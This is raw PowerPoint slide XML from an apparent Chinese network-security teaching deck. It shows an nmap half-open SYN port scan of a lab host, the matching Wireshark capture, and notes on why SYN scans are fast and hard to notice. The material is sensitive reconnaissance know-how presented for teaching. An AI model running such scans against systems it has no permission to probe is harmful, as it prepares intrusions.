            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732145" y="1459548"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.使用“nmap -sS 192.168.172.129”命令对目标主机进行半开放式SYN扫描，如图2-2-41所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732145" y="2104708"/>
            <a:ext cx="5057775" cy="2524125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5732145" y="4628833"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-41 半开放式SYN端口扫描结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行TCP SYN协议的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤三</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="932815"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用Wireshark工具抓取的数据包如图2-2-42所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="1577975"/>
            <a:ext cx="5267325" cy="2990850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5309870" y="4568825"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-42 Wireshark工具抓取的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857500" y="5004435"/>
            <a:ext cx="8529320" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SYN扫描是默认的也是最受欢迎的扫描选项。它执行得很快，在一个没有入侵防火墙的快速网络上，每秒钟可以扫描数千个端口。相对来说SYN扫描不张扬、不易被注意到，因为它从来不完成TCP连接。它也不像FIN、Null、Xmas、Maimon和Idle扫描依赖于特定平台，它可以应对任何兼容的TCP协议栈。它还可以明确可靠地区分open(开放的)、closed（关闭的）和filtered(被过滤的）状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
